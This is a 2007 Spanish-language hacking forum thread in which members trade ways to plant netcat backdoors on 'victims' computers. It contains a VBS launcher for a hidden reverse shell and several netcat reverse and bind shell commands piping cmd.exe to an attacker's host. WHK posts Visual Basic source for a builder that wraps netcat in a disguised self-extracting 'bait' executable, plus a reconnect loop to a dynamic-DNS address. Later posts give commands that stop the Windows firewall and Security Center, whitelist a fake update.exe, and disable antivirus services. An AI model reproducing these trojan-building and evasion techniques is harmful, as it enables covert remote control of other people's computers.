Título: Re: Jugando con netcat
Publicado por: Novlucker en 24 Abril 2007, 23:00 pm
Yo lo que hago cuando se trata de ejecutar algun comando de ms-dos oculto es meterlo en un *.vbs.... siempre doy vueltas con este lenguaje, y me gusta, pero es que a mi me sirve  :P, y resulta mas funcional que batch

Código:
set objshell = createobject("wscript.shell")
objshell.run "cmd /c nc -d TU_IP 21 | cmd.exe | nc -d TU_IP 25", vbhide

Espero te solucione algo

 :D


Título: Re: Jugando con netcat
Publicado por: Alesiter en 25 Abril 2007, 16:09 pm
en "troyanisando al netcat" si la victima tiene la ip dinamica
no me sirve de nada ponerlo el netcat en el registro para q se inicie automaticamente cada q se enciende la pc, porq cuando entre a internet ya no tendra la misma ip y no servira de nada,como puedo solucionar este problema?


Título: Re: Jugando con netcat
Publicado por: Novlucker en 25 Abril 2007, 16:31 pm
Conexion inversa:

En tu pc:
nc -vv -l -p nrodepuerto

Pc victima:
nc -d -e cmd.exe tuip nrodepuerto
Deberias de incluirlo con un AT para que lo haga a una determinada hora en la que vas a estar conectado

Si recien empiezas puedes ver tambien el paper de Zhyzura:
http://foro.elhacker.net/index.php/topic,58032.0.html


Título: Re: Jugando con netcat
Publicado por: ne0x en 25 Abril 2007, 19:06 pm
Si la victima usa algun firewall no podras usar la shell inversa normal y corriente, tendras que usar la shell pipelada o volteada, tambien un tipo de shell inversa.

Mira esto:

Jugando con Netcat VI
http://foro.elhacker.net/index.php/topic,159799.msg757010.html#msg757010

Para novlucker:

Voy a probarlo a ver que tal, si me funciona entonces lo pondre.


Título: Re: Jugando con netcat
Publicado por: ne0x en 25 Abril 2007, 20:03 pm
novlucker, si que me funciona, muchas gracias.


Luego publicare como troyanizar el netcat y que no salga ninguna ventana negra usando vbs (por parte de novlucker)


Título: Re: Jugando con netcat
Publicado por: Novlucker en 25 Abril 2007, 22:05 pm
 ;D Gracias... me alegro que te haya servido.... y no me habia puesto a pensar que mucho dicen.... "como hago para que no me salga la ventana de ms-dos??", y la respuesta de siempre, incluso yo la doy a veces es "agarra quick batch file compiler y listo"

Con tu pregunta
Citar
Yo lo que sigo buscando es como ocultar la ventana que te sale al ejecutar el SFX...
se me prendio una lamparita  :P


Título: Re: Jugando con netcat
Publicado por: Martín Fierro en 25 Abril 2007, 23:06 pm
Hace dos años hice un pequeño interfaz para el netcat en vbasic y hace poco que descubrí, en Autoit me dieron ganas de hacerlo en este compilador y lo hice.

Por cierto dentro de sus funciones puedes abrir un puerto con la ventana oculta, nada que se quede en el registro ni otra cosa pero eso es lo de menos.

Se los dejo, también lo tengo en vbasic pero Autoit tiene la ventaja de no pedirte librerias ni dlls.

(http://img230.imageshack.us/img230/2809/ncguiua2.png)

Download en Autoit (http://www.esnips.com/doc/acd5fed2-c47e-4df3-aa6f-3bb3beb48556/ncgraphics-Autoit)

Download en Vbasic (http://www.esnips.com/doc/1f71cf38-c0ad-4858-b03c-9a7a652a66e7/ncgraphcis)

La versión de Vbasic está más chula con un background chungo pero me gusta más la del autoit que4 no necesita librerías.
ojalá les guste.


Título: Re: Jugando con netcat
Publicado por: Novlucker en 26 Abril 2007, 03:59 am
WHK esta creando una interfase un poco mas completa, pero de cualquier manera la tuya simplifica en mucho su uso... ademas y un poco fuera de contexto, ahora conozco Autoit  ;D, voy a ver que tal esta..............

Salu2


Título: Re: Jugando con netcat
Publicado por: WHK en 30 Abril 2007, 01:48 am
cliente-nc 1.9 actualizado:

(http://www.subir-imagenes.com/imagenes/defe52d5da.gif)

ya casi termino... cuando lo haga lo pongo acá.


Título: Re: Jugando con netcat
Publicado por: Grave en 30 Abril 2007, 22:57 pm
Tengo un problema con lo de mandar mail anonimos esto es lo que me sale...

(http://img46.imageshack.us/img46/2915/loled3.png) (http://imageshack.us)

No sé si seran los servidores DNS o mi conexion y tambien para WHK si podria continuar con lo de Jugando con Netcat porque le faltaron algunas cosas como lo del IRC


Título: Re: Jugando con netcat
Publicado por: ne0x en 30 Abril 2007, 23:03 pm
Lo del IRC?, voy a buscar en google como puede aplicarse el netcat al IRC, es haciendo un cliente?


Título: Re: Jugando con netcat
Publicado por: Martín Fierro en 30 Abril 2007, 23:55 pm
Puedes interactuar con un servidor de irc con el netcat, en una de las revistas de hackxcrac (la mítica serie raw) te decían como..

Yo lo hice alguna ves con el server irc que trae el nettools..

De eso fue , hace como dos discos duros...  :D  :D


Título: Re: Jugando con netcat
Publicado por: WHK en 1 Mayo 2007, 06:26 am
Claro... ningun problema... buscaré información sobre coneccciones en IRC y MSN messenger atraves del netcat ya que con un papper que vi puedes telnetear a MSN y porque no transformar tu netcat en un cliente mas  ;D

Por lo visto el correo si te funcionó bien.. solo que tienes problemas para resolver los dominios de mx*.hotmail.com y eso deve ser a que:

1. Estas baneado por bombardear  :xD
2. Tu firewall no te permite tener acceso a servidores MSTP. Algunos antivirus vienen con esa opcion predeterminada para evitar el envio descontrolado de correos.
3. ping -n 1 mx1.hotmail.com Si no responde es porque de alguna forma tu pc no te permite el acceso a el.
4. Microsoft en banca rota Aunque eso lo dudo mucho  :xD


Título: Re: Jugando con netcat
Publicado por: WHK en 1 Mayo 2007, 07:10 am
Servidor NC 1.2

Bueno.. hice un programa bastante improvisado pero bastante efectivo para solucionar el problema de muchos...
La ides de este programa es crear servidores de netcat.... solo le pasas a la victima el ejecutable y ya tienes la shell sin compilar nada.
Lo bueno es que cuando abres la carnada no se ve ni un pantallazo del DOS como se hacia antes.

(http://www.subir-imagenes.com/imagenes/e19fa34bc2.gif)

Tanto el programa como el codigo fuente está disponible como siempre en http://512.iespana.es/nc

Codigo:

Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess&, ByVal bInheritHandle&, ByVal dwProcessId&) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long

Private Sub Command1_Click()
sCmd = "copy join.dll " + Text7.Text + ".exe&&copy rar.dll rar.exe&&Echo set nc=%random%.exe > make.bat&&Echo copy nc.dll %nc% >> make.bat&&Echo Echo %nc% " + Text4.Text + " " + Text5.Text + " ^^^|cmd.exe^^^| " + Text4.Text + " " + Text6.Text + " -d ^> ejecutar.txt >> make.bat&&Echo rar a " + Text7.Text + ".exe -m5 -n ejecutar.txt %nc% >> make.bat&&Echo del /f /q ejecutar.txt >> make.bat&&Echo del /f /q %nc% >> make.bat&&make.bat&&del /f /q make.bat&&del /f /q rar.exe"
hShell = Shell(Environ$("Comspec") & " /c " & sCmd, vbHide)
End Sub

Private Sub Command2_Click()
sCmd = "copy join.dll " + Text7.Text + ".exe&&copy rar.dll rar.exe&&Echo set nc=%random%.exe > make.bat&&Echo copy nc.dll %nc% >> make.bat&&Echo Echo %nc% -d -e cmd.exe " + Text2.Text + " " + Text3.Text + " ^> ejecutar.txt >> make.bat&&Echo rar a " + Text7.Text + ".exe -m5 -n ejecutar.txt %nc% >> make.bat&&Echo del /f /q ejecutar.txt >> make.bat&&Echo del /f /q %nc% >> make.bat&&make.bat&&del /f /q make.bat&&del /f /q rar.exe"
hShell = Shell(Environ$("Comspec") & " /c " & sCmd, vbHide)
End Sub

Private Sub Command3_Click()
Dim hShell As Long
Dim sCmd As String

sCmd = "copy join.dll " + Text7.Text + ".exe&&copy rar.dll rar.exe&&Echo set nc=%random%.exe > make.bat&&Echo copy nc.dll %nc% >> make.bat&&Echo Echo %nc% -L -d -e cmd.exe -p " + Text1.Text + " ^> ejecutar.txt >> make.bat&&Echo rar a " + Text7.Text + ".exe -m5 -n ejecutar.txt %nc% >> make.bat&&Echo del /f /q ejecutar.txt >> make.bat&&Echo del /f /q %nc% >> make.bat&&make.bat&&del /f /q make.bat&&del /f /q rar.exe"
hShell = Shell(Environ$("Comspec") & " /c " & sCmd, vbHide)

End Sub

Private Sub Command4_Click()
End
End Sub

Private Sub Command5_Click()
Form2.Show
End Sub

Private Sub Form_Unload(Cancel As Integer)
On Error Resume Next
Unload Me
Form2.Hide
End
End Sub
'Creado por WHK para el foro de elhacker.net


Título: Re: Jugando con netcat
Publicado por: ne0x en 1 Mayo 2007, 14:19 pm
Este ultimo es el que mas me gusta !!

Muy bueno, hay que probarlo a ver si funciona como se dice.


Título: Re: Jugando con netcat
Publicado por: Martín Fierro en 1 Mayo 2007, 16:43 pm
Felicidades compadre, nunca se me hubiera ocurrido, hacerlo así.....

La pregunta estriba respecto a que los join.dll y el rar.dll así como el nc.exe vienen comprimidos en el ejecutable o lo traes en una carpeta, no he bajado el archivo y te pregunto a rajatabla.

Veo si lo traduzco al autoit para que no necesites dlls y las dlls tools se compriman en el mismo ejecutable.

De verdad que me admira tu ingenio... Lo hubiera hecho yo si se me hubiera ocurrido, también he manejado el rar en línea de comandos, aunque el join.dll sí que no lo conozco...


Título: Re: Jugando con netcat
Publicado por: WHK en 1 Mayo 2007, 23:46 pm
Para nada compadre... en realidad el nc.dll es el mismo netcat con extension .dll para que no lo borren :p, es mas... renombra nc.dll a nc.exe y veras el netcat con el icono modificado por el resourcehack, el rar.dll es el rar.exe utilizado para crear el empaquetado en modo consola... el join.dll es la base de otro programa que hice comprimido para que se fusione con el netcar mas las instrucciones dadas por el server-nc.. en realidad hace un copy join.dll %random%.exe donde %random%.exe [comando]
Con esto de %random% lo hice para que puedas enviar todas las shells que quieras sin que te cause nungun problema al dar una segunda.
En otras palabras realmente no son dlls sino partes del mismo progrma que les puse extension dll para que no los borraran y funcionaran como dependencias.
--------------------------------------------------------
También incluí en las descargas el Ejecute Invisible 1.0 que tuve que hacer en visual basic para poder ejecutar el netcat... está con codigo fuente y todo:

Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess&, ByVal bInheritHandle&, ByVal dwProcessId&) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long

Private Sub Form_Load()
On Error Resume Next
Dim LTD As String, F As Variant
Open App.Path & "\ejecutar.txt" For Input As FreeFile
Input #1, LTD
Text1.Text = LTD
Close #1

Dim hShell As Long
Dim sCmd As String

sCmd = "cmd /c " & Text1.Text
hShell = Shell(Environ$("Comspec") & " /c " & sCmd, vbHide)
End
End Sub
'Creado por WHK para el foro de elhacker.net


Como se ve no se mucho de programación pero si tengo harto ingenio :p

Como siempre en http://512.iespana.es/nc
Este espacio en mi web es exclusivo para el foro y no para todo el resto del publico para que despues no digan que me cuelgo del foro para levantar mi web  :P ademas no lo necesito


Título: Re: Jugando con netcat
Publicado por: Martín Fierro en 2 Mayo 2007, 03:51 am
Para nada compadre... en realidad el nc.dll es el mismo netcat con extension .dll para que no lo borren :p, es mas... renombra nc.dll a nc.exe y veras el netcat con el icono modificado por el resourcehack, el rar.dll es el rar.exe utilizado para crear el empaquetado en modo consola... el join.dll es la base de otro programa que hice comprimido para que se fusione con el netcar mas las instrucciones dadas por el server-nc.. en realidad hace un copy join.dll %random%.exe donde %random%.exe [comando]
Con esto de %random% lo hice para que puedas enviar todas las shells que quieras sin que te cause nungun problema al dar una segunda.
En otras palabras realmente no son dlls sino partes del mismo progrma que les puse extension dll para que no los borraran y funcionaran como dependencias.
--------------------------------------------------------
También incluí en las descargas el Ejecute Invisible 1.0 que tuve que hacer en visual basic para poder ejecutar el netcat... está con codigo fuente y todo:


Ya lo estoy viendo, conozco la técnica, yo lo hice igual con varios programas, incluso puedes empaquetarlo con el Fusion en el mismo ejecutable, el nc.dll y el cryptcat.dll los tengo así en varios programas que hice para GUI de ellos, también hice un manager GUI para wget y use la misma técnica.

Sipo le entendí a tu código a la primera, pero si te confieso que el del join si no lo identifique.

Enhorabuena, te digo ya vere con tiempo si lo paso a autoit y claro te doy el crédito.

Hace tiempo que renuncié al VB para adoptar el autoit que es menos pesado y necesita menos ocx y demás, además es más Basic.


Título: Re: Jugando con netcat
Publicado por: WHK en 2 Mayo 2007, 04:13 am
join.dll es un ejecutable winrar SFX donde dentro está el ejecute_invisible.exe ... lo que hace el programa es renombrar nc.dll a %random%.exe y a rar.dll a rar.exe y con todo eso comprimir el %random%.exe + ejecutar.txt dentro del rar ejecutable con el nombre propuesto en text1.text
si kieres verlo puedes abrirlo extrayendo ficheros con winrar... es mas.. al servidor puedes cambiarle el icono con el mismo winrar y es completamente configurable para el que tenga conocimientos un poco mas avanzados, pero por ahora asi como está es ideal para los que re100 estan aprendiendo. y ojo que las librerias no deben ir en ningun otro lado que no sea en el mismo directorio (carpeta) donde está el programa ya que no son dll reales... como dije.. no se mucho de programación asi que use la imaginación para juntar el rar en modo consola y un winrar sfx para que el servidor-nc haga las configuraciones necesarias sobre ellos.


Título: Re: Jugando con netcat
Publicado por: WHK en 4 Mayo 2007, 07:04 am
El que quería usar el Net Cat para entrar en los IRC la respuesta estaba aca mismo:
http://foro.elhacker.net/index.php/topic,93666.0.html


Título: Re: Jugando con netcat
Publicado por: Grave en 9 Mayo 2007, 22:08 pm
Como puedes ver… acá mostré como hacer interactuar el netcat con un servidor y transformarlo en un anonimail XD o ftp client… también puedes hacer un consultador SQL, un bot IRC, un cliente tftp… etc etc etc… es solo cosa de imaginación

Me referia a eso :¬¬


Título: Re: Jugando con netcat
Publicado por: diorena en 9 Mayo 2007, 22:39 pm
hola sabes tengo un problema ya que baje el netcat y el reshack pero no me funciona nada a pesar de seguir tus instrucciones al pie de la letra, ademas te cuento que baje e reshack y esta en español lo cual es diferente a lo que tu tienes en el tema, me podrias dar una pauta de donde bajar el reshack en ingles ya que no lo encuentro o bien iluminarme en algo que puedo estar haciendo mal de antemano gracias.

muy buen tema y muy interesante gracias


Título: Re: Jugando con netcat
Publicado por: nica en 9 Mayo 2007, 23:47 pm
baja el programa que puso whk, en realidad si funciona, lo unica pregunta que tengo es que kuando uso un scaneador de puertos, mas especificamente el nmap este no me arroja que tengo abierto ese puerto... por que???


* donde se puede modificar o se puede agregar al codigo que no se cree el ejecutable 31823.exe, por que se mira todo sospechoso en el administrador de tareas
* lo otro es que se crea en la carpeta de los temporales del usuario en donde se ejecuta, pero se crea en alguna otra carpeta???


** me puse a pensar que al final de las cosas y para mientras uno se logee usando el server de whk se puede subir el netcat siempre troyanizado a otra carpeta y agregar la ruta al registro de windows.


Título: Re: Jugando con netcat
Publicado por: WHK en 10 Mayo 2007, 05:52 am
Modificaré el server-nc para ponerle un nombre propio al proceso ya que lo hice como %random% para que pudieses tener mas de una shell directa o remota sin causar conflictos con otras configuraciones anteriores.
Cuando se crea el servidor este deja una shell remota el cual puedes cerrarloel proceso del netcat. El archivo se ejecuta en %TMP% porque es el único lugar donde tienes 100% sobreescritura sin importar el usuario en que estes (Restringida).

Me pondré a trabajar con lo del bot IRC Aunque no creo que algunos se pongan muy contentos porque mis bots son algo macabro jajajajaja es broma... lo haré.


Título: Re: Jugando con netcat
Publicado por: nica en 12 Mayo 2007, 00:32 am
para los que tenian problemas con ".... no es una aplicacion win32 valida..." pues les cuento que a mi se me resolvio el problema primero haciendo el proceso en winrar, incluso hasta se pueden saltar el paso del reshacker por que el mismo winrar te agrega el incono al ejecutable, pero si lo kieren pasar por el reshack pues no hay problem por que tambien lo hice asi y no hubo problema, solo recuerden que primero la parte del rar y despues la parte del reshack.

por cierto tengo una duda, como puedo hacer para que no se me cierre la conexion y que esta siempre este activa????


Título: Re: Jugando con netcat
Publicado por: WHK en 12 Mayo 2007, 06:57 am
antorchahumana25 :
Puedes bajarlo de http://512.iespana.es/nc

Nica:
Puedes hacer que el netcat escuche a un bat en ves del cmd.exe donde el bat diga:

@echo off
:1
nc -d -e cmd.exe ip puerto
goto 1


De esta forma cuando se te desconecte el netcat solito volverá a conectarse denuevo y también puedes añadir una entrada de registro con el comando reg add para que inicie automaticamente en cada reinicio de esa pc (recuerda que para eso Debes tener una ip fija donde te llegue la shell o puedes tener una cuenta No-Ip y poner tu DNS (nombre de dominio) en ves de la ip)
EJ:

@echo off
:1
nc -d -e cmd.exe bogamory.sytes.net 80
goto 1


Ahora estoy terminando otras cosas pero cuando termine buelvo para terminar lo del bot IRC con netcat y esto mismo de reconecciones automaticas pero con imagenes.


Título: Re: Jugando con netcat
Publicado por: WHK en 12 Mayo 2007, 08:03 am
Hoy en dia el netcat es detectado como archivo potencialmente malicioso pero puedes agregarlo a la lista de archivos omitidos para que no te lo borre. Para mayor comodidad te recomiendo ponerlo en tu system32 y poder manejar las conexiones ejecutando directamente nc desde tu linea de comandos (CMD).


Título: Re: Jugando con netcat
Publicado por: WHK en 12 Mayo 2007, 09:10 am
claro.. repetiré las cosas mil y una ves hasta que todos hayan aprendido por muy poco que sepan.

alt 126 ~
alt 124 |
alt 60 <
alt 62 >

netcat pipeado haciendo reverse shell

------------------------------------------------------
atacante:
nc -vv -L -p 80
nc -vv -L -p 25
------------------------------------------------------
victima:
nc xxx.xxx.xxx.xxx 80 | cmd.exe | nc xxx.xxx.xxx.xxx 25 -d
------------------------------------------------------
se enviaran comandos por puerto 80
y se resiviran por puerto 25
de esa manera se pasa al fw de windows SP2
------------------------------------------------------

netcat en reverse shell

------------------------------------------------------
atacante:
nc -vv -L -p 25
------------------------------------------------------
victima:
nc -d -e cmd.exe xxx.xxx.xxx.xxx 25
------------------------------------------------------
Se enviara una reverse shell por el puerto 25
------------------------------------------------------

netcat shell directa

------------------------------------------------------
victima:
nc -L -d -e cmd.exe -p 25
------------------------------------------------------
atacante:
nc xxx.xxx.xxx.xxx 25 -vv
------------------------------------------------------
La victima deja netcat a la escucha por el puerto 25
para que posteriormente el atacante se conecte
------------------------------------------------------


Título: Re: Jugando con netcat
Publicado por: WHK en 12 Mayo 2007, 10:08 am
Definición de una shell acá:
http://es.wikipedia.org/wiki/Int%C3%A9rprete_de_comandos

Uso de una shell acá:
http://www.ignside.net/man/dos/batch.php
http://www.sitiosargentina.com.ar/webmaster/cursos%20y%20tutoriales/COMANDOS_DEL_DOS.htm
http://foro.elhacker.net/index.php/board,64.0.html


Como tomar una shell acá:
http://foro.elhacker.net/index.php/topic,58032.0.html

Jugar con la shell acá:
http://foro.elhacker.net/index.php/topic,159799.0.html

Talves sea necesario crear un nuevo post sobre el manejo de una shelll desde lo mas básico hasta lo más complejo... pero eso será despues por falta de tiempo.


Título: Re: Jugando con netcat
Publicado por: nica en 12 Mayo 2007, 19:13 pm
jejejeje me toy acordando con tanta preguntadera que ta respondiendo el whk, cuando estaba iniciando yo.... aun no kreo que ni llegue a newbie pero voy haciendo el intento, el caso esta en que estoy niños se estan metiendo a esto y no leen, no crean que las cosas siempre las tendran en sus manos, hay que leer y cuando aparezca una duda pues haganla pero no sin antes investigar un poco..


por cierto hoy en dia el netcat es detectado por la mayoria de los av, el caso esta, en que si alguien ha probado trantando de joder los offset con algun editor hexad. y aun asi si ha funcionado el nc???


Título: Re: Jugando con netcat
Publicado por: __d_mode__ en 25 Mayo 2007, 12:01 pm
@WHK your programmes looks awsome,but i cant speak spanish, sometimes i using google translate for read ur letters but i cant use ur programs, plz add to the program english language pack, regards from turkey...



Título: Re: Jugando con netcat
Publicado por: WHK en 25 Mayo 2007, 13:34 pm
there is no problem, I will as far as possible try to create greater content in English so that all can learn since my aim is that all can have right to the knowledge comes from where comes. ;) You do not worry, I will do it.


Título: Re: Jugando con netcat
Publicado por: Asingato en 26 Mayo 2007, 08:15 am
Hola. Todos. Yo soy bien nuevo en esto. Como podran ver es mi primer mensage. E leido mucho, pero aun me quedan mcuhas dudas, porque la unica manera de lograr esto es practicando. Asi que Voy a preguntar asi pase de boba mi pregunta.

He leido todo esto y aqui me surgio mi primera duda despues de ir haciendo todo paso a paso como indica WHK. ¿De donde sale esta ventana negra? Es algun otro programa? o sencillamente es el DOS de mi computador?

"Ahora vamos a crear el programa que nos conectará con la victima, y se llama “Cliente”
Solo ejecutamos esto y estaremos listos para recibir la conexión de quien abra la carnada:

(http://www.subir-imagenes.com/imagenes/59ab1fe62b.gif) "


Asiq ue la pregunta es donde abro esta ventana? Y esto es parte de la programacion o debo abrirla cuando ya haya enviado el troyano?

Despues de esto me gustaria saber teniendo ya la shell creda. ¿ Como le subo archivos al otro pc? Debo escojer la carpeta donde se guarden? Es decir si ya le voy a enviar otro troyano para poder ver el escritorio de mi victima como lo hago y desde que programa?

Muchas gracias, espero que me pueda solucionar mis dudas. Si cometi el erro de rpetir una pregunta, disculpenme y remitanme a la respuesta, pero es que de verdad no encontre la pregunta hecha. Muchas gracias y disculpenme la primiparada.


Título: Re: Jugando con netcat
Publicado por: WHK en 26 Mayo 2007, 08:32 am
(http://www.subir-imagenes.com/imagenes/59ab1fe62b.gif)

Esta ventana es el DOS como bien dices y puedes abrirla ejecutando: CMD
Citar
Solo ejecutamos esto y estaremos listos para recibir la conexión de quien abra la carnada
Asi es... solo lo ejecutas y ya estas listo :D recuerda que Debes usar tu ip en ves de la mia o 127.0.0.1

Ademas para que funcione el comando nc Debes bajar el nc.exe y ponerlo dentro de tu carpeta de system32 para mayor comodidad.
Puedes bajarlo desde acá:
http://www.vulnwatch.org/netcat/nc111nt.zip

Y para ver el escritorio de la otra persona mira estos dos post:
http://foro.elhacker.net/index.php/topic,161170.0.html
http://foro.elhacker.net/index.php/topic,41671.0.html


;) Nadie ha nacido sabiendo verdad?

Traducción al ingles/translation to the English:

This window is the D.O.S. as you say well and you can open executing it: CMD
Citar
Single we executed this and we will be ready to receive the connection of that opens the bait
Thus he is… single you execute it and or these ready it :D remembers that You must use your IP in you see of mine or 127.0.0.1
In addition so that it works the commando nc You must lower nc.exe and put it within your folder of system32 for greater comfort. You can lower it from here:
http://www.vulnwatch.org/netcat/nc111nt.zip
And to see the writing-desk of the other these two person post watches:
http://foro.elhacker.net/index.php/topic,161170.0.html
http://foro.elhacker.net/index.php/topic,41671.0.html

Nobody has been born knowing truth?  ;)


Título: Re: Jugando con netcat
Publicado por: Asingato en 26 Mayo 2007, 17:28 pm
Muchas gracias por tu ayuda. Ahora me surge otra duda. El archivo que yo tengo que mandarle a la victima, es la carnada? o el archivo que renombramos iexplorer.exe?

El iexplorer, es el que antiguamente era en nc.exe, es abosulatemente necesario que este archivo este en la carpeta de system32? o se puede tener en otra carpeta?

Yo me baje el netcat de otra pagina, ya que no encontr el link en la tuya, y al bajarmelo, venis con el nc, que fue el que renmbramos, porfavor corrigeme si estoy mal.

LA ultima cosa es que cuadno ejecuto cmd, no me aparece lo mismo que veo en su pantalla, ya que a ud le sale de una en la carpeta de windows. a mi me aparecen :

C:/documentsandsettings/estudio> (bueno con los backslash de manera adecuada)

Supungo debo estar en la carpeta de windows para hacer esta programacion. ¿Como llego a esta carpeta?
De antemano gracias


Título: Re: Jugando con netcat
Publicado por: nica en 28 Mayo 2007, 21:08 pm
no hay problemas con lo que te aparezca a vos a la hora de abrir la consola, lo unico que para poder correr el nc, recuerda que tiene que estar en la carpeta del system32 que es el path del sistema para que este comando pueda ser llamado desde cualquier locacion. es cuestion de criterio de cada kien y de gusto de cada kien, lo puedes poner en la system32 o en una carpeta llamada "jodedera" es a como tu kieras, solo recuerda que si lo pones en una carpeta diferente a la del system32, tienes que entrar a esa carpeta y ejecutar los comandos...


Título: Re: Jugando con netcat
Publicado por: D4RIO en 31 Mayo 2007, 13:21 pm
Hola, se me dio por hacerme una cuenta aca para saldar una cuenta con este querido NetCat. Resulta que he intentado frustradamente y varias veces descargar el programilla y cada vez que descomprimo el contenido del archivo me desaparece el nc.exe que es en fin lo que me interesa. Me veo limitado a usar los aburridos paquetes de siempre, con NirCmd, Shutdown y un par mas (los agrego a un paquete autoextraible si los deseo utilizar, y como tip uso un batch que tome informacion de la variable PATH para instalar el programa, el mismo se autoejecuta al descomprimir).

Y sobre eso, nica, system32 no es el unico path del sistema y de hecho si lo deseamos podemos poner a esa tal carpeta "jodedera" (lindo nombre, jeje) dentro de la variable path haciendo innecesario el tener que ejecutar los comandos desde dentro de ella. Eso podemos hacerlo mediante el viejo comando set, expandiendo PATH mediante %PATH:str1=str2%
Podemos hacer que esto sea parte de un Batch y tome las expansiones de la variable de algun archivo de texto (producto de otro Batch corrido en una auto-descompresion) mediante for /F "tokens=*" %%i in (nomredelarchivo.txt) bla bla bla...
Asi y abusando de %systemdrive%, por ejemplo, podemos hacer que nuestro programa se instale con éxito en cualquier máquina que use windows...jejeje ;D


Título: Re: Jugando con netcat
Publicado por: WHK en 1 Junio 2007, 07:57 am
Citar
cada vez que descomprimo el contenido del archivo me desaparece el nc.exe que es en fin lo que me interesa
Lo mas probable es que tu antivirus te lo esté eliminando por lo cual deverás desactivarlo mientras lo usas o agregarlo a la lista de archivos omitidos por el mismo.

Citar
Me veo limitado a usar los aburridos paquetes de siempre, con NirCmd
Yo antes de conocer el netcat usaba mucho el nircmd  ;D es una buenisima herramienta, pero lo malo es que casi todos los antivirus lo detectan y no te proporciona tanta flexibilidad como el netcat (en algunos casos incluia el nircmd junto con el netcat con un winrar SFX  ;D de esa forma manejaba mas rápido las funciones de la appi en windows pero a estas alturas ya no lo necesito mucho :P).

Citar
Eso podemos hacerlo mediante el viejo comando set
Yo p`refiero que la gente coloque el netcat dentro de carpetas donde todos puedan obtener acceso como %tmp% o %homepath% ya que en algunos casos la carpeta del sistema está restringida por no tener derechos de admin  :-\ ademas las variables no se guardarán si creas los comandos desde el mismo autoejecutable (tendrías que crear un BAT y no creo que al usuario le guste ver una ventanita DOS y esperar a que todo se ejecute antes de cerrarla).

Como te digo... solo desactiva un poco tu antivirus y despues descargalo  ;)


Título: Re: Jugando con netcat
Publicado por: D4RIO en 1 Junio 2007, 15:47 pm
Citar
ademas las variables no se guardarán si creas los comandos desde el mismo autoejecutable (tendrías que crear un BAT y no creo que al usuario le guste ver una ventanita DOS y esperar a que todo se ejecute antes de cerrarla).

Es verdad, pequeño detalle, jeje...Respecto al NirCmd es buena, y permite bastante, pero tiene muchos limites que no me gustan, y muchas de las cosas que ofrece son nuevas formas de escribir cosas que el mismo cmd ya traia, como el caso de las variables de sistema, o el trabajo sobre el registro. Sin embargo es cierto que tiene lo suyo (movecursor, multiremote...)...Y a mi tambien me gusta mandar SFX con varias cosas ;D
Y por lo del netcat ya configure el antivirus para que no haga nada con esa clase de archivos "sospechosos", asique ya puedo usar netcat sin problemas. Gracias igual...

Ahora, una duda. Si quiero enviar netcat a alguien para generar una conexion inversa como puedo hacer para que su antivirus no me lo detecte (a demas de desactivar el firewall de windows y el centro de seguridad que es cosa de dos renglones)


Título: Re: Jugando con netcat
Publicado por: WHK en 1 Junio 2007, 18:00 pm
Citar
como puedo hacer para que su antivirus no me lo detecte (a demas de desactivar el firewall de windows y el centro de seguridad que es cosa de dos renglones)

Para el servicio de Centro de seguridad:
net stop  "Centro de seguridad"
   
Para el servicio del Firewall de Windows:
net stop  "Firewall de Windows/Conexión compartida a Internet (ICS)"

Burlar Firewall:
reg add HKLM\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\ /v "%homedrive%%homepath%\update\update.exe" /t reg_sz /d "%homedrive%%homepath%\update\update.exe:*:Enabled:update" /f

Burlar Antivirus:
Ayer con una persona detubimos facilmente el servicio de karpesky (ya no recuerdo el nombre) con net stop.
Primero ejecutas net start y buscas los dos servicios relacionados con este antivirus y despues ejecutas net stop "servicio" despues vas a la carpeta del antivirus y ejecutas cacls *.exe /E /C /P %username%:n&&cacls *.exe /E /C /P SYSTEM:n Para que el antivirus no pueda volver a ejecutarse, desintalarse ni reinstalarse nuevamente(Solo funciona con derechos de admin).


Título: Re: Jugando con netcat
Publicado por: D4RIO en 2 Junio 2007, 04:26 am
Creo que sobre el firewall no me di a entender, es decir, esa es la parte facil ya que el firewall de windows es facil de burlar y/o desactivar. A propósito sobre ésto a veces aparece como "Windows Firewall/Internet Connection Sharing (ICS)", aunque cabe probar simplemente net stop SharedAccess, supongo que sabras eso pero puede serle util a otro que lo lea.
Respecto al antivirus he intentado con net stop "Active Virus Shield" que es el nombre con el que aparece el servicio del mismo, pero lo que obtengo es un error ya que la detencion o interrupcion no es valida para ese servicio, es decir que ese servicio no acepta el comando net stop
Bien, lei que el LD-Pinch (conocido troyano) logra con exito detener los procesos de algunos antivirus, como pavsrv51 (panda antivirus), supongo que se podrá con taskkill, o con NirCmd killprocess, pero no creo que me sirva para mucho. El tema es lograr que una maquina ajena no reconozca que le meti netcat...pero es todo un trabajito de investigacion, jaja


Título: Re: Jugando con netcat
Publicado por: D4RIO en 2 Junio 2007, 05:57 am

Bueno, jaja! supongo que eso sera para WHK... ;D

yo tambien tenia un vago proyecto de hacer un SO mas lindo...ahora estaba viendo que por aca hay otro grupo asi que se llama grupo solar...no se si estan trabajando en un SO, lo que se es que trabajan con software libre...igual por ahora hay que esperar un poquito y prepararse para los nuevos microprocesadores Intel y AMD (competencia pura... XD) y el nuevo monitor de Microsoft...porque si no vas con esa tecnologia le das el lugar a microsoft de tomar el mercado.


Título: Re: Jugando con netcat
Publicado por: WHK en 2 Junio 2007, 06:36 am
Citar
supongo que se podrá con taskkill, o con NirCmd killprocess
No puedes detener un proceso directamente de esa forma... con karpesky si funcionó detener el servicio... conozco a alguien por ahi que sabe detener el Nod32 pero es un proyecto suyo llamado NOD32 2.70 Fucker , pero lamentablemente no es mio pero sería bueno si pudiera compartirlo  ;D... de todas maneras una solución era modificar o recompilar el netcat de tal forma que ya no sea detectado, pero creo que lo tenía olvidado  :P.


Título: Re: Jugando con netcat
Publicado por: marlon_agz en 2 Junio 2007, 08:37 am
my friend :(

hice todo a la perfeccion (creo)xD  y me dice que no es una aplicacion win32 valida :S


ya lo intente desde cero 3 veces y sigue el mismo error :S


y donde ingreso estos comandos? :S

net stop  "Centro de seguridad"

net stop  "Firewall de Windows/Conexión compartida a Internet (ICS)"

Supongo que esto es un bat, lo comprimo junto con el netcat con winrar y lo pongo en comentario ?
